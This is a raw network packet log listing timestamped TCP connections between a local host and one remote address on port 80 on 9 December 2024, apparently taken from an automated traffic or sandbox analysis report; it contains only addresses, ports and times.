                                                                                              Dec 9, 2024 16:00:37.604346991 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604356050 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604366064 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604374886 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604470015 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604628086 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604636908 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604789019 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604799032 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604958057 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604968071 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605082035 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605091095 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605273008 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605283022 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605417013 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605437994 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605448008 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605575085 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605593920 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605726004 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.605902910 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.696629047 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.724154949 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.724473953 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.724647045 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.770098925 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.922023058 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.934995890 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.026982069 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.174645901 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.218894958 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.312227011 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.314802885 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.431916952 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.432020903 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.434107065 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.434200048 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.434356928 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.553787947 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.781555891 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:38.803881884 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.900974989 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:38.909017086 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.738765955 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:39.782144070 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.782932997 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.797019005 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.902355909 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:39.902678967 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.903280020 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:39.906775951 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.906934023 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:39.970696926 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.026926041 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.093905926 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.100490093 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.101242065 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.220953941 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.221019983 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.221182108 CET804974437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.221226931 CET4974480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.221318960 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.266098022 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.340641975 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.387561083 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.387573957 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:40.579246044 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:40.698916912 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.185609102 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.418291092 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.418359041 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.492619991 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.534048080 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.726821899 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.875247955 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.875747919 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.876533985 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.996360064 CET804974537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.996417046 CET4974580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.997479916 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.997494936 CET804974637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:41.997553110 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.997585058 CET4974680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:41.997818947 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:42.117242098 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:42.344016075 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:42.464006901 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.293565035 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.422032118 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.526642084 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.609520912 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.662601948 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.663325071 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.783376932 CET804974837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.783483028 CET4974880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.783521891 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:43.783600092 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.783799887 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:43.904706955 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:44.141036987 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:44.260438919 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.063651085 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.109560013 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.298460960 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.422065020 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.423083067 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.423795938 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.542907000 CET804975137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.542989016 CET4975180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.543292999 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.543457031 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.543610096 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:45.662828922 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:45.890894890 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.010474920 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.423440933 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.438292980 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.542954922 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.543041945 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.543173075 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.558509111 CET804975237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.558569908 CET4975280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.625741959 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.663743019 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.745148897 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.745260954 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.745899916 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:46.865310907 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:46.891196966 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:47.010734081 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.010747910 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.094175100 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:47.213581085 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.819869041 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:47.922050953 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.015729904 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.054800987 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.125128984 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.126625061 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.254266024 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.312669992 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.375140905 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.375488043 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.375854969 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.495896101 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.495912075 CET804975337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.496001959 CET4975380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.496021032 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.496217012 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.496987104 CET804975937.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.500322104 CET4975980192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.616125107 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:48.846326113 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:48.965730906 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:49.777524948 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:49.890777111 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.010581017 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:50.093940020 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.143243074 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.262690067 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:50.264722109 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.264944077 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.384267092 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:50.609761000 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:50.729187965 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:51.567677975 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:51.797019005 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:51.802381992 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:51.923039913 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:51.924633980 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.042902946 CET804976737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:52.042965889 CET4976780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.043904066 CET804977337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:52.043970108 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.044157982 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.163495064 CET804977337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:52.390973091 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:52.510375023 CET804977337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.066029072 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.066215038 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.186245918 CET804977437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.186894894 CET804977337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.186985970 CET4977380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.186990023 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.187114000 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.198304892 CET4977680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.307024956 CET804977437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.317698956 CET804977637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.319459915 CET4977680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.319574118 CET4977680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.439506054 CET804977637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.531476974 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.650949001 CET804977437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.650962114 CET804977437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:53.672122002 CET4977680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:53.791953087 CET804977637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:54.486439943 CET804977437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:54.547897100 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:54.591447115 CET804977637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:54.722563982 CET804977437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:54.797036886 CET4977680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:54.812705994 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:54.826522112 CET804977637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:54.953603983 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:54.953670025 CET4977680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:54.954328060 CET4978180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:55.073707104 CET804977437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:55.073864937 CET804978137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:55.073930979 CET4977480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:55.074007034 CET4978180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:55.074157000 CET4978180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:55.075186014 CET804977637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:55.076630116 CET4977680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:55.193799973 CET804978137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:55.422173977 CET4978180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:55.541682005 CET804978137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:56.392175913 CET804978137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:56.484544992 CET4978180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:56.626420021 CET804978137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:56.627448082 CET4978180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:56.747414112 CET804978137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:56.747665882 CET4978180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:56.828521967 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:56.949196100 CET804978737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:56.949280977 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:56.949455976 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:57.068974972 CET804978737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:57.297116041 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:57.417016983 CET804978737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:58.219134092 CET804978737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:58.281416893 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:58.454638958 CET804978737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:58.597618103 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:58.627332926 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:58.628635883 CET4979380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:58.747251034 CET804978737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:58.747910023 CET804979337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:58.747967958 CET4978780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:58.747997999 CET4979380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:58.748187065 CET4979380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:58.867348909 CET804979337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:59.094018936 CET4979380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:59.213852882 CET804979337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:59.745484114 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:59.745738983 CET4979380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:59.865673065 CET804979437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:59.865751028 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:59.866218090 CET804979337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:59.866274118 CET4979380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:59.870028019 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:59.982692003 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:59.989315987 CET804979437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:00.102602005 CET804979637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:00.102672100 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:01:00.102823019 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:01:00.219016075 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:01:00.222448111 CET804979637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:00.338701963 CET804979437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:00.338717937 CET804979437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:00.453352928 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:01:00.573187113 CET804979637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:01.136001110 CET804979437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:01.312674999 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:01:01.373186111 CET804979637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:01:01.422053099 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.246844053 CET804979437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:01.297118902 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.391387939 CET804979637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:01.437838078 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.541124105 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.541214943 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.541754007 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.661652088 CET804979437.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:01.661725044 CET4979480192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.661931038 CET804993137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:01.661999941 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.662081003 CET804979637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:01.662130117 CET4979680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.662130117 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:01.781524897 CET804993137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:02.015983105 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:02.135510921 CET804993137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:02.939073086 CET804993137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:02.984622002 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.182363987 CET804993137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:03.234690905 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.312125921 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.312596083 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.432708979 CET804993137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:03.432768106 CET4993180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.432818890 CET804993737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:03.432879925 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.433032036 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.552468061 CET804993737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:03.781613111 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:03.901073933 CET804993737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:04.715818882 CET804993737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:04.765958071 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:04.941869974 CET804993737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:04.948070049 CET804976137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:04.948157072 CET4976180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.000245094 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.060808897 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.061486959 CET4994180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.180962086 CET804994137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:05.180975914 CET804993737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:05.181052923 CET4993780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.181061029 CET4994180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.181252956 CET4994180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.304582119 CET804994137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:05.532155037 CET4994180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:05.651469946 CET804994137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.267283916 CET4994580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.267539978 CET4994180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.388078928 CET804994537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.388216972 CET4994580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.388338089 CET4994580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.388421059 CET804994137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.388475895 CET4994180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.389385939 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.507666111 CET804994537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.508871078 CET804994637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.508979082 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.509105921 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.628591061 CET804994637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.734760046 CET4994580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.854259014 CET804994537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.854296923 CET804994537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:06.859740973 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:06.979206085 CET804994637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:07.658607006 CET804994537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:07.703392029 CET4994580192.168.2.437.44.238.250
